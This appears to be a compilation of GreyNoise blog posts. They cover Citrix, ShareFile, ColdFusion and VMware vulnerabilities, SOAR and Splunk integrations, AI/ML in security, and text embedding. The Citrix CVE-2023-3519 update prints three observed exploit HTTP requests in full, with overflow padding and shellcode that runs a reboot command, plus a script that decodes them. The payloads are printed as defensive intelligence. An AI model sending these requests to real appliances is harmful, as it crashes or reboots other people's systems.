
Will the real Citrix CVE-2023-3519 please stand up?

(See below for the most recent update: 2023-08-03)

Citrix recently disclosed a single critical remote code execution (RCE) vulnerability, CVE-2023-3519, affecting NetScaler ADC and NetScaler Gateway (formerly Citrix ADC and Citrix Gateway). This vulnerability has a CVSS score of 9.8, making it a critical-severity issue.

GreyNoise has a tag — Citrix ADC/NetScaler CVE-2023-3519 RCE Attempt — that organizations can use to proactively defend against sources of known exploitation.

Over the past several days, numerous organizations have contributed their pieces of the puzzle, both publicly and privately. While the most recent Citrix Security Advisory identifies CVE-2023-3519 as the only vulnerability resulting in unauthenticated remote code execution, there are at least two vulnerabilities that were patched during the most recent version upgrade.

Analysis by Rapid7 and Assetnote uncovered a memory corruption vulnerability in the ns_aaa_saml_parse_authn_request function, which handles Security Assertion Markup Language (SAML) requests and can be reached through HTTP POST requests to “/saml/login”. This vulnerability has been demonstrated to corrupt memory and cause program crashes, but it is not yet known whether it can be leveraged for remote code execution.

Analysis by Bishop Fox’s Capability Development team, working together with GreyNoise, identified a memory corruption vulnerability in the ns_aaa_gwtest_get_event_and_target_names function, which can be reached through HTTP GET requests to “/gwtest/formssso”. This vulnerability was demonstrated to be capable of stack corruption leading to remote code execution, and was further corroborated by Assetnote’s Part 2 analysis.

Analysis from Mandiant has surfaced some indicators of compromise (IoCs) and post-exploitation activity. Among the IoCs they shared, an HTTP POST request was used in initial exploitation, as were HTTP payloads containing “pwd;pwd;pwd;pwd;pwd;”, which may be useful for writing detection signatures.

2023-08-03 Update

On July 28th, GreyNoise began observing activity (https://viz.greynoise.io/tag/citrix-adc-netscaler-cve-2023-3519-rce-attempt?days=30) for CVE-2023-3519 in which the attacker attempts to leverage the vulnerability for memory corruption. An initial analysis of the observed payloads indicates that the attacker first sends a payload containing 262 `A`s, which would crash the Citrix NetScaler `nsppe` process. They follow up with two variants using URL-encoded values that appear to attempt remote execution of the command `/bin/sh -c reboot`, which would fully reboot the system. However, the attacker may not be aware of the CPU endianness of vulnerable systems: the payloads they are sending would corrupt memory, but would not achieve the remote code execution they expected, instead crashing the `nsppe` process.

The observed payloads are provided below for completeness.

GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80 HTTP/1.1
Host: :2375
Accept: */*
User-Agent: curl/7.29.0
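For readers who want to inspect the URL-encoded portion of these requests themselves, here is a minimal Python sketch (not part of the original analysis tooling; the shortened padding is illustrative) that decodes the `target` parameter with the standard library and dumps its printable characters:

from urllib.parse import unquote_to_bytes

# Truncated copy of the observed target parameter; the real payload begins
# with a long run of "A" characters used to overflow the buffer.
encoded_target = (
    "AAAAAAAAAAAAAAAA"  # padding shortened for readability
    "%F0%C1%FF%FF%FF%7F%00%00CCCCCCCCDDDDDDDD"
    "%99Rhn%2Fshh%2F%2Fbih%20-c%20h%22rebhoot%22%89%E3QRSSj%3BX%CD%80"
)

raw = unquote_to_bytes(encoded_target)

# Replace non-printable bytes with "." so the embedded strings (push-style
# fragments of "/bin/sh", "-c", and "reboot") become visible.
print("".join(chr(b) if 32 <= b < 127 else "." for b in raw))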

Timeline

How to Leverage GreyNoise in Your SOAR Playbooks

During our latest webinar, Proactive Defense Made Easy: Leveraging GreyNoise in Your SOAR Playbooks, we discussed some everyday use cases for GreyNoise with SOAR platforms. The main goals of pairing GreyNoise with a SOAR platform are to quickly identify opportunistic attacks, gain better insight into how infrastructure is being used, and enrich alerts with RIOT data for IPs associated with common business services.

Using GreyNoise to identify opportunistic scanning provides context for decisions in a SOAR playbook, whether that is to investigate further or to move quickly to block IPs. Adding these checks to an investigation playbook provides data on scan activity and any vulnerabilities observed being exploited.
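To make that concrete outside of any particular SOAR product, here is a minimal sketch using the GreyNoise Python SDK; the `triage_ip` helper and its decision logic are hypothetical, not part of any vendor playbook:

from greynoise import GreyNoise  # pip install greynoise

session = GreyNoise(api_key="YOUR_API_KEY")

def triage_ip(ip: str) -> str:
    """Hypothetical first decision step for a single alerted IP."""
    context = session.ip(ip)  # full IP context lookup
    if not context.get("seen"):
        return "investigate"   # not observed scanning the internet: possibly targeted
    if context.get("classification") == "malicious":
        return "block"         # opportunistic and malicious: block quickly
    if context.get("classification") == "benign":
        return "suppress"      # known benign scanner: drop the alert
    return "investigate"

print(triage_ip("8.8.8.8"))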

A Tines story that uses GreyNoise as the first step in deciding what additional investigation is needed.

RIOT data also speeds up investigations. Many services integrated into an investigation playbook will provide details when something is malicious, but often don't provide details on known-good services. Everyone wants the confidence to take action with their automation but may not have the insight needed, and no one wants to be wrong about that decision. RIOT adds this information to a playbook to assist with decision-making.

A phishing email playbook in XSOAR identifying Office 365 emails using RIOT data.

GreyNoise can be used in common SOAR use cases to provide better context for phishing playbooks and investigations, and to give teams more confidence to block IPs. The power of GreyNoise alongside other intelligence tools like Recorded Future, VirusTotal, Tines, and Splunk is nothing short of astonishing (see our full list of integrations). I hope the insights shared during the webinar inspire you to explore these tools further and optimize your cybersecurity investigations. Sign in/up for GreyNoise to explore our data for free.

Watch the full webinar

How to Create Actionable Intelligence with AI and Machine Learning

AI/ML and cybersecurity go together like peanut butter and bananas. You might not think it’s a fit, but it can work out great if you’re into it.

I recently did a talk with Centripetal and wanted to share some highlights as well as the entire video below. This covers a few themes, such as: “how has ML been used in cybersecurity in the past”, “what are the problems with it”, “why we need to use it”, “how to use it responsibly”, and “what to do with all these GPTs”.

If you’re interested in watching it in full, here is the talk.

ML In Security

One of the first use cases for ML in security was spam filtering in early email clients in the late 90s. This was a simple bag-of-words plus naive Bayes model approach, but it has gotten much more complicated over time.
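For a sense of how simple that original approach was, here is a toy sketch (made-up training data, purely illustrative) of a bag-of-words plus naive Bayes spam classifier using scikit-learn:

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

# Tiny, made-up training set: 1 = spam, 0 = ham.
emails = [
    "win a free prize now", "cheap meds limited offer",
    "meeting notes attached", "lunch tomorrow at noon",
]
labels = [1, 1, 0, 0]

# Bag-of-words features feeding a naive Bayes classifier.
model = make_pipeline(CountVectorizer(), MultinomialNB())
model.fit(emails, labels)

print(model.predict(["free prize meds"]))         # likely spam
print(model.predict(["notes from the meeting"]))  # likely ham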

More recently, ML has been used to build malware detection models. Almost all anti-malware engines in VirusTotal have some ML component.

It has also been used in outlier detection (determining spikes in logs/alerts/traffic) and in rule or workflow generation.

What’s The Problem?

However, it’s not all sunshine, roses, and solved problems. ML has some trust issues, especially when it comes to cybersecurity. Models are never perfect and can create False Negatives and False Positives. 

False Negatives are when we do not detect something as bad when it is indeed bad—it’s a miss. This has obvious problems of allowing something malicious to act on your system/network without your knowledge. 

False Positives are when we call a non-malicious thing bad. This can be just as big of an issue, as it creates unnecessary alerts, leading to alert fatigue and ultimately to ignored alerts, which allows actual malicious activity to slip through the cracks.

Cybersecurity has a very low tolerance for both types of errors, and therein lies the issue. ML solutions have to be very, very good at detection without creating too much noise. They also have to provide context for why the ML tool made its determination. 

Why Bother?

It might seem like a pain to use complicated tools like ML/AI, but the brutal truth is that we have to. There is too much data to work through. GreyNoise sees over 2 million unique HTTP requests a day, and that’s just one protocol.

Plus, bad actors aren’t slowing down. Verizon’s DBIR recorded 16k incidents and 5k data breaches last year, and that is merely what is reported. There are ~1,000 Known Exploited Vulnerabilities (CISA) floating around (side note: GreyNoise has tags for almost all of them). 

There is no getting around it, we need to use ML/AI technology to handle the load of information and allow us to become better at defense.

How To Use It

Here I hope to give some practical advice on developing ML/AI tools. It really comes down to two main deliverables: Confidence and Context.

By “Confidence” I don’t mean the ROC score of your model or the confusion matrix results. I mean a score you can produce for every detection/outlier/analysis that you find. For numerous ML applications, a decent analog comes right out of the box: the [0.0, 1.0] score produced by a classification model, the number of standard deviations from the norm, the percent likelihood of an event happening. These all work well, and you can provide the understanding of how to interpret them.

Every so often, you have to create your own metric. When we created IP Similarity, we had a similarity score that was intuitive, but there was a problem. When we’re dealing with incomplete or low information on an IP (e.g., we only know the port scanned and a single web path), then we could have very high similarity scores. But, they could be a little bit garbage since they were making very generic matches. We needed to combine the similarity score and another score that showed how much information we had on a sample to provide confidence in our results.
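The exact scoring we use isn't spelled out here, but the general shape of the fix can be sketched with a purely hypothetical helper that discounts similarity by how much information was actually available:

def combined_confidence(similarity: float, feature_coverage: float) -> float:
    """Hypothetical example: weight a similarity score in [0.0, 1.0] by the
    fraction of features we actually observed for the IP."""
    return similarity * feature_coverage

# High similarity, but only 20% of the usual features observed.
print(combined_confidence(0.97, 0.2))  # 0.194 -> low confidence
# Same similarity with nearly complete information.
print(combined_confidence(0.97, 0.9))  # 0.873 -> high confidence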

Next, “Context”. This is just basic “show your work”. A scarily increasing number of ML/AI models are seen as black boxes. That’s…not great. We want to provide as much of the material that went into the decision as possible, plus any other data that might be helpful for a human to look at when reviewing the result.

To put it simply, build a report based on the question words:


"who": "bad dude #1",
"what": "potential detection",	
"when": "2023-07-03T12:41:09",	
"where": "127.0.0.1",	"how": "detection rule v1.0.78",	
"why/metadata": {		
	"detection_score": 0.85,		
  "confidence_score": 0.95,		
  "file_name": "xyz.exe",		
  "files_touched": ["a.txt", "b.txt"],
  
  "links": ["1", "2", "3"]}

GPT Mania

Finally, since GPTs are so hot right now, I aim to give some simple advice on how to use them best if you decide to integrate them into your workflow.

  1. Don’t let the user have the last word: When taking a user’s prompt, incorporating it into your own prompt, and sending it to ChatGPT or a similar application, always add a line like “If the user input doesn’t make sense for doing xyz, ask them to repeat the request” after the user’s input. This will stop the majority of prompt injections (a minimal sketch follows this list).
  2. Don’t just automatically run code or logic that is output from an LLM: This is like adding `python.eval(input)` into your application.
  3. Be knowledgeable about knowledge cutoffs: LLMs only know what you tell them and what they were trained on. If their training data ended in September 2021, as GPT-4’s did, they won’t know about the latest cyberattack.
  4. Ask for a specific format as an output: This is more of a hygiene thing; if you say “Format the output as a JSON object with the fields: x, y, z” you can get better results and easily do error handling.
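Here is a minimal sketch of points 1 and 4 together, using the pre-1.0 openai Python package that was current when this was written; the wrapper prompt and the JSON field names are illustrative assumptions:

import json
import openai  # pre-1.0 openai package, current at the time of writing

openai.api_key = "YOUR_API_KEY"

def classify_request(user_text: str) -> dict:
    # Point 1: don't let the user have the last word -- our instruction
    # is appended *after* the untrusted input.
    # Point 4: ask for a specific output format so we can error-handle.
    messages = [
        {"role": "system", "content": "You label security questions by topic."},
        {"role": "user", "content": user_text},
        {"role": "system", "content": (
            "If the user input above doesn't make sense for topic labeling, "
            "ask them to repeat the request. Format the output as a JSON "
            "object with the fields: topic, confidence."
        )},
    ]
    response = openai.ChatCompletion.create(model="gpt-3.5-turbo", messages=messages)
    try:
        return json.loads(response["choices"][0]["message"]["content"])
    except json.JSONDecodeError:
        return {"topic": "unknown", "confidence": 0.0}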

Conclusion

Artificial Intelligence and Machine Learning can provide extreme value to your product and workflows, but they are not trivial to introduce. With some care and simple guidelines, you can implement these in a way that helps your users without creating additional burden or ambiguity. 

We're cooking up some interesting projects using AI and ML at GreyNoise. Sign in/up to see IP Similarity, NoiseGPT and our other Labs projects (https://api.labs.greynoise.io/1/docs/#definition-NoiseGPT), and get notified of Early Access for what's coming down the pipeline!

Introducing CVE-2023-24489: A Critical Citrix ShareFile RCE Vulnerability

2023-08-16 Update:

GreyNoise observed a significant spike in attacker activity the day CISA added CVE-2023-24489 to their Known Exploited Vulnerabilities Catalog:

time-series chart of elevated activity

Citrix ShareFile, a popular cloud-based file-sharing application, has recently been found to have a critical vulnerability, CVE-2023-24489, which allows unauthenticated arbitrary file upload and remote code execution (RCE). In this blog post, we will discuss the details of this vulnerability, how attackers can exploit it, and how you can protect your organization from potential attacks.

GreyNoise now has a tag for CVE-2023-24489, allowing us to track exploit activity related to this vulnerability. If you use Citrix ShareFile, make sure to apply the latest security updates as soon as possible to patch this critical RCE flaw.

What is CVE-2023-24489?

CVE-2023-24489 is a cryptographic bug in Citrix ShareFile’s Storage Zones Controller, a .NET web application running under IIS. This vulnerability allows unauthenticated attackers to upload arbitrary files, leading to remote code execution. The vulnerability has been assigned a CVSS score of 9.8, indicating its critical severity.

How are attackers exploiting CVE-2023-24489?

Attackers can exploit this vulnerability by taking advantage of errors in ShareFile’s handling of cryptographic operations. The application uses AES encryption with CBC mode and PKCS7 padding but does not correctly validate decrypted data. This oversight allows attackers to generate valid padding and execute their attack, leading to unauthenticated arbitrary file upload and remote code execution.

Researchers at Assetnote dissected the vulnerability and published the first proof-of-concept (PoC) for this CVE. Other PoCs for this have been released on GitHub, increasing the likelihood of attackers leveraging this vulnerability in their attacks and further demonstrating the severity of the issue. 

As of the publishing timestamp of this post, GreyNoise has observed IPs attempting to exploit this vulnerability. Two had never been seen by GreyNoise before this activity:

chart of active exploitation activity

Protecting your organization from CVE-2023-24489

Citrix has released a security update addressing the ShareFile vulnerability. Users are advised to apply the update to protect their systems from potential attacks. The fixed version of the customer-managed ShareFile storage zones controller is ShareFile storage zones controller 5.11.24 and later versions. The latest version of ShareFile storage zones controller is available from the following location: https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-511.html.

External Resources

Enhancing Security with GreyNoise

Leverage GreyNoise’s hourly updated data on scanning and exploit activities to stay ahead of opportunistic attackers. Our threat intelligence platform allows you to identify noise, reduce false positives, and focus on genuine threats. Sign up for GreyNoise Intelligence today and gain the edge in protecting your systems against vulnerabilities like CVE-2023-24489.

Three New Tags For ColdFusion (2 🏷️) and Citrix (1 🏷️)

GreyNoise detection engineers have released tags for:

  • Citrix ADC/NetScaler CVE-2023-3519 Remote Code Execution (RCE) Attempts
  • Adobe ColdFusion CVE-2023-29298 Access Control Bypass Attempts
  • Adobe ColdFusion CVE-2023-29300 Remote Code Execution (RCE) Attempts

Adobe ColdFusion Vulnerabilities

CVE-2023-29298 is an Improper Access Control vulnerability affecting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in a security feature bypass, allowing an attacker to access the administration CFM and CFC endpoints without user interaction. The vulnerability has a CVSS 3.x base score of 7.5, indicating high severity.

CVE-2023-29300 is a Deserialization of Untrusted Data vulnerability impacting Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier), and 2023.0.0.330468 (and earlier). This vulnerability could result in arbitrary code execution without user interaction. The vulnerability has a CVSS 3.x base score of 9.8, indicating critical severity.

Citrix ADC/NetScaler Vulnerability

CVE-2023-3519 is an unauthenticated remote code execution (RCE) vulnerability impacting several versions of Citrix ADC and Citrix Gateway. This vulnerability allows a malicious actor to execute arbitrary code on affected appliances. It may also serve as an initial access vector for ransomware and other types of malicious campaigns. GreyNoise would like to thank the Capability Development team at Bishop Fox for collaborating with us to track this emerging threat. They have an excellent, detailed write-up for folks interested in more details.

CISA's Known Exploited Vulnerabilities Catalog

All three vulnerabilities are listed in CISA's Known Exploited Vulnerabilities Catalog, meaning they have been observed being exploited in the wild and pose significant risks to organizations. Organizations should prioritize remediation efforts for these vulnerabilities to reduce the likelihood of compromise by known threat actors.

External Resources

Enhance Security with GreyNoise's Threat Intelligence Data

Organizations are strongly encouraged to use GreyNoise’s hourly updated threat intelligence data to block IP addresses that are seen exploiting these vulnerabilities. By leveraging GreyNoise's tags and alerts, organizations can enhance their security posture and protect their systems from potential exploitation attempts while allowing their operations teams time to apply patches or mitigations.

Cutting Through the Noise: How GreyNoise Helps Security Analysts

In today's world, where networks generate an overwhelming amount of data, security analysts often find themselves struggling to separate the real threats from the noise. Their days are spent in a constant reactive mode, leaving little room for proactive measures due to limited time and resources. In this blog post, we'll delve into how GreyNoise empowers security analysts and transforms their daily work by cutting through the noise and providing invaluable insights.

So, what exactly is GreyNoise?

GreyNoise is a powerful threat intelligence platform designed to assist security analysts in identifying noise and minimizing false positives. By meticulously collecting and analyzing internet-wide scan and attack data, GreyNoise equips security teams with contextual information about the threats they encounter. With its ability to filter out noise and shed light on the sources of attacks, GreyNoise empowers security analysts to focus their efforts on genuine threats.

How we can help

1. Maximizing SOC Efficiency: Banishing False Positives

Security Operation Centers (SOCs) are often inundated with an overwhelming barrage of security alerts. However, it's disheartening to discover that a significant portion of these alerts, often exceeding 50%, are nothing more than false positives or irrelevant internet noise. One exasperated GreyNoise customer even lamented, "Stop chasing ghosts!" (this is why you will see our little “ghostie” icon in many places on our website and in our product). GreyNoise comes to the rescue by enabling SOC teams to filter out known benign and noisy alerts originating from SIEM and SOAR systems. This empowers analysts to laser-focus on targeted and malicious activities that truly demand attention. Learn More >>

2. Enhancing Threat Intelligence: The Power of Context

GreyNoise takes threat intelligence to new heights by providing security analysts with valuable context surrounding the sources of attacks. Through thorough analysis of internet-wide scan and attack data, GreyNoise identifies patterns and offers insights into the tactics, techniques, and procedures (TTPs) employed by attackers. Armed with this knowledge, security analysts gain a deeper understanding of the threats they face, enabling them to devise more effective strategies to mitigate risks and safeguard their organizations. Learn More >>

3. Defending Against Mass Exploitation Attacks: Staying One Step Ahead

GreyNoise provides an early warning system for vulnerabilities being actively exploited in the wild, plus dynamic IP blocklists that security teams can use during their window of exposure. Now you can swiftly identify trending internet attacks focused on specific vulnerabilities and CVEs, efficiently triage alerts based on malicious, benign, or targeted IP classifications, and take proactive measures to block and hunt down IP addresses opportunistically exploiting a particular vulnerability. By leveraging these comprehensive features, security teams gain an edge in staying ahead of threats and bolstering their defenses against mass exploitation attacks. Learn More >>

Conclusion

Security analysts grapple with numerous challenges in their day-to-day work, including the overwhelming volume of network data and the complexity of evolving threats. However, GreyNoise emerges as a formidable ally, providing context about attack sources, reducing false positives, and bolstering incident response capabilities. By harnessing the power of GreyNoise, security analysts can direct their attention to genuine threats and ensure their organizations remain resilient against cyber threats.

Take the first step and explore our data for free to experience the transformative power of GreyNoise firsthand. 

Text Embedding for Fun and Profit

Words != Numbers

Computers don’t understand words. They don’t understand verbs, nouns, prepositions, or even adjectives. They kinda understand conjunctions (and/or/not), but not really. Computers understand numbers.

To make computers do things with words, you have to make them numbers. Welcome to the wild world of text embedding!

In this blog I want to teach you about text embedding, why it’s useful, and a couple ways to do it yourself to make your pet project just a little bit better or get a new idea off the ground. I’ll also describe how we’re using it at GreyNoise.

Use Cases

With LLMs in the mix, modern use cases of text embedding are all over the place.

  • Can’t fit all your text into a context window? Try embedding and searching the relevant parts.
  • Working on sentiment analysis? Try to build a classifier on embedded text
  • Looking to find similar texts? Create a search index on embedded values
  • Want to build a recommendation system? Figure out how things are similar without building a classification model

In all of these, we’re encoding a piece of text into a numerical vector in order to do basic machine learning tasks against it, such as nearest neighbors or classification. If you’ve been paying attention in class, this is just feature engineering, but it’s unsupervised and on unstructured data, which has previously been a really hard problem.

How to method 1: Cheat mode

Lots of large models offer sentence-level embedding APIs. One of the most popular is OpenAI's (https://platform.openai.com/docs/guides/embeddings). It doesn’t cost a ton, probably under $100 for most data sets, but you’re dependent on the latency of external API calls and the whims of another company. Plus, since it’s a GPT model, the embedding is based on the encoding of the last word in your text (with the cumulative words before it), which doesn’t feel as cohesive as what I’m going to suggest next. (This is foreshadowing a BERT vs. GPT discussion.)
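If you go this route, the call itself is only a few lines. This sketch uses the pre-1.0 openai Python package that was current when this was written; the model name follows OpenAI's embeddings guide linked above:

import openai  # pre-1.0 openai package

openai.api_key = "YOUR_API_KEY"

response = openai.Embedding.create(
    model="text-embedding-ada-002",
    input=["GET /gwtest/formssso?event=start", "POST /saml/login"],
)

# One 1536-dimensional vector per input string.
vectors = [item["embedding"] for item in response["data"]]
print(len(vectors), len(vectors[0]))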

How to method 2: Build your own

Side quest: GPT vs BERT

GPT stands for Generative Pre-trained Transformer. It is built to predict the next word in a sequence, and then the next word, and then the next word. Alternately, BERT stands for Bidirectional Encoder Representations from Transformers. It is built to predict any word within a set piece of text. 

The little bit of difference between them, because they both use Transformers, is where they mask data while training. During the training process a piece of the text is masked, or obscured, from the model and the model is asked to predict it. When the model gets it right, hooray! When the model gets it wrong, booo! These actions either reinforce or change the weights of the neural network to hopefully better predict in the future. 

GPT models only mask the last word in a sequence. They are trying to learn and predict that word. This makes them generative. If your sequence is “The cat jumped” it might predict “over”. Then your sequence would be “The cat jumped over” and it might predict “the”, then “dog”, etc. 

BERT models mask random words in the sequence, so they take the entire sequence and try to figure out the word based on what came before and after (bidirectional!!!). For this reason, I believe they are better for text embedding. Note: the biggest GPT models are orders of magnitude bigger than the biggest BERT models because there is more money in generation than in encoding/translation, so it is possible GPT-4 does a better job at generic sentence encoding than a home-grown BERT, but let's all collectively stick it to the man and build our own; it’s easy.

Figure 1: BERT based masking
Figure 2: GPT based masking

Main quest: Building a text encoder

If your data is not just basic English text, building your own encoder and model might be the right decision. For GreyNoise, we have a ton of HTTP payloads that don’t exactly follow typical English language syntax. For this reason, we decided to build our own payload model and wanted to share the knowledge.

There are two parts to an LLM, the same parts you’ll see in Hugging Face models (https://huggingface.co/models) and everywhere else: a tokenizer and a model.

Tokenizer

The tokenizer takes your input text and translates it to a base numerical representation. You can train a tokenizer to learn vocabulary directly from your dataset or use the one attached to a pre-trained model. If you are training a model from scratch you might as well train a tokenizer (it takes minutes), but if you are using a pre-trained model you should stick with the one attached. 

Tokens are approximately words, but if a word is over 4-5 characters it might get broken up. “Fire” and “fly” could each be one token, but “firefly” would be broken into 2 tokens. This is why you might often hear that tokens are “about ¾ of a word”; it’s the average ratio of words to tokens. Once you have a tokenizer, it can translate a text into integers representing indices into the tokenizer’s vocabulary.

“The cat jumped over” -> 456, 234, 452, 8003

Later, supposing we have a model, if you have the output 8003, 456, 234, 452 (I reordered on purpose) you could translate that back to “over the cat jumped”

The tokenizer is the translation of a numeric representation to a word (or partial word) representation. 
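As a concrete illustration with the Hugging Face tokenizer class used later in this post (the integer IDs below are made up; the real values depend entirely on the vocabulary you train):

from transformers import RobertaTokenizerFast

model_path = "./payload-model"  # wherever you saved your trained tokenizer
tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)

ids = tokenizer("The cat jumped over")["input_ids"]
print(ids)                    # e.g. [0, 456, 234, 452, 8003, 2] -- includes special tokens
print(tokenizer.decode(ids))  # "<s>The cat jumped over</s>"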

Model

With a tokenizer, we can pass numerical data to a model and get numerical data out, and then re-encode that to text data.

We could discuss the models themselves, but others have done that before (https://huggingface.co/blog/bert-101). All of these LLM models are beasts. They have basic (kinda) components, but they have a lot of them, which makes for hundreds of millions to billions of parameters. For 98% of people, you want to know what a model does, the pitfalls, and how to use it without knowing the inner workings of how transformer layers are connected to embedding, softmax, and other layers. We’re going to leave that to another discussion and focus on what it takes to train and get a usable output.

The models can be initialized with basic configs and trained with easy prompts, thanks to the folks at Hugging Face (you the real MVP!). For this we are going to use a RoBERTa model (https://huggingface.co/docs/transformers/model_doc/roberta). You could use a pre-trained model and fine-tune it; however, we’re just going to use the config and build the whole model from scratch with random weights. A very similar workflow works if you want to use a pre-trained model and tokenizer, though. I promise I won’t judge.

Code

Import or copy the code from the model training gist.

Create your own list of text you want to train the encoder and model on. It should be at least 100k samples.

If you have created your data set as `str_data` and set a model path as a folder where you want to save the model and tokenizer, you can just do:

tokenizer = create_tokenizer(model_path, str_data[0:50000]) ## you don’t really need more than 50k to train the tokenizer
model = create_model_from_scratch(model_path, tokenizer)

This will create the tokenizer and model. The tokenizer is usable at this state. The model is just random untrained garbage though.

When you’re ready for the first train, get into the habit of loading the tokenizer and model you created and training it, this is what people call “checkpoints”.

tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
model = RobertaForMaskedLM.from_pretrained(model_path)
model = train_model(tokenizer, model, model_path, str_data[0:100000]) ## train on however much you want at a time, there is a whole other discussion about this, but give it at least 100k samples.

When you want to retrain or further train, which at this point is also called fine-tuning, just load it up and go again with new or the same data. Nobody is your boss and nobody really knows what is best right here.

Note: You’re going to want to use GPUs for training. Google Colab and Huggingface Notebooks have some free options. All in, this particular model will require 9-10GB of GPU memory, easily attainable by commodity hardware.

Evaluating

Large Language Models do not have a great list of sanity checks. Ironically, most benchmarks are against other LLMs. For embeddings, we can do a little better when working toward your personal model. When you take two samples that you think are similar and run them through the model to get the embeddings, you can calculate how far apart they are with either cosine or Euclidean distance. This gives you a sanity check of whether your model is performing as expected or has gone off the rails.
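The training gist doesn't prescribe how to pull an embedding out of the masked-language model, so this is one common approach (an assumption on my part): load the base RoBERTa encoder and mean-pool the last hidden state into a single vector.

import torch
from transformers import RobertaModel, RobertaTokenizerFast

model_path = "./payload-model"  # wherever you saved your tokenizer and model
tokenizer = RobertaTokenizerFast.from_pretrained(model_path, max_len=512)
encoder = RobertaModel.from_pretrained(model_path)  # base encoder, no MLM head

def embed(text: str):
    inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512)
    with torch.no_grad():
        outputs = encoder(**inputs)
    # Mean-pool the token vectors into one fixed-size embedding.
    return outputs.last_hidden_state.mean(dim=1).squeeze().numpy()

embedding1 = embed("GET /gwtest/formssso?event=start")
embedding2 = embed("GET /gwtest/formssso?event=stop")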

For Euclidean distance use:

import numpy as np

euclidean_dist = np.linalg.norm(embedding1 - embedding2)

For cosine distance use:

from sklearn.metrics.pairwise import cosine_similarity

cos_sim = cosine_similarity(embedding1.reshape(1, -1), embedding2.reshape(1, -1))

How We’re Using it at GreyNoise

We’re early adopters of LLM tech at GreyNoise, but it is hard to put it in the hands of users responsibly. We basically don’t want to F up. We have an upcoming feature called NoiseGPT that takes natural language text and turns it into GNQL queries. Begone the days of learning a new syntax for just figuring out what the hell is going on. 

We also have an in-development feature called Sift, a way to tease out new traffic on the internet and describe it for users. This would take the hundreds of thousands of HTTP payloads we see every day, reduce them to the ~15 new and relevant ones, and describe what they are doing. EAP coming on that soon.

Plus, if you think of any great ideas we should be doing, please hit us up. We have a community slack and my email is below. We want to hear from you. 

Fin

With these tips I hope you’re able to create your own LLM for your projects or at least appreciate those that do. If you have any questions please feel free to reach out to daniel@greynoise.io, give GreyNoise a try (https://viz.greynoise.io/), and look out for features using these techniques in the very near future.

Observed In The Wild: New Tag For CVE-2023-20887 — VMWare Aria Operations for Networks

On June 7, 2023, VMware released an advisory for CVE-2023-20887, a command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Cloud Management) with a critical severity score (CVSS) of 9.8. The proof of concept for this exploit was released on June 13, 2023 by SinSinology.

The primary takeaway is:

“VMWare Aria Operations Networks is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user.” – SinSinology


This issue can be resolved by updating to the latest version. Further information can be found here: https://www.vmware.com/security/advisories/VMSA-2023-0012.html

At the time of writing, we have observed attempted mass-scanning activity utilizing the proof-of-concept code mentioned above in an attempt to launch a reverse shell that connects back to an attacker-controlled server to receive further commands. Continual monitoring of activity related to this vulnerability can be tracked via the relevant GreyNoise tag below.

Example HTTP POST request containing code to exploit the described vulnerability

Splunk and GreyNoise Integration: Discovering Hidden Insights through Feeds and Dashboards

If you’ve ever seen a GreyNoise presentation by me, it’s more than likely that at some point I pulled up my Splunk instance to show what I consider to be a few clever dashboards and searches. Apart from the impromptu searches that I may write (which may not be great), there are some powerful and practical ways you can leverage GreyNoise data inside your Splunk environment right now.

Feeds

With the latest version of the GreyNoise app for Splunk (v2.2.0), you can now keep the last 24 hours of data local to your Splunk instance with feeds. Plus, it’s easier than ever to filter out noise from large datasets. Instead of relying on API lookups, the data can be referenced locally first to quickly remove opportunistic and benign IPs when hunting through your data.

Filtering web logs to remove IPs that GreyNoise classifies as benign: index=main sourcetype=access_combined | lookup greynoise_indicators.csv ip as clientip | search NOT classification=benign

Dashboards

A good dashboard can turn a bad day into a great one.

I always joke that data isn’t real until it’s displayed on a map, but there's some truth to it! Having a quick overview of your data visually makes it easier to piece together an understanding of the scan activity landscape.

Using custom commands, you can pull out information on internet traffic you can safely and confidently ignore (things we classify as ‘benign’ or IPs from the RIOT dataset) and particular pieces of information you may want to investigate further. Everything left over will include the IPs that are not in GreyNoise, which could indicate more targeted attacks, and IPs we classify as ‘unknown’.

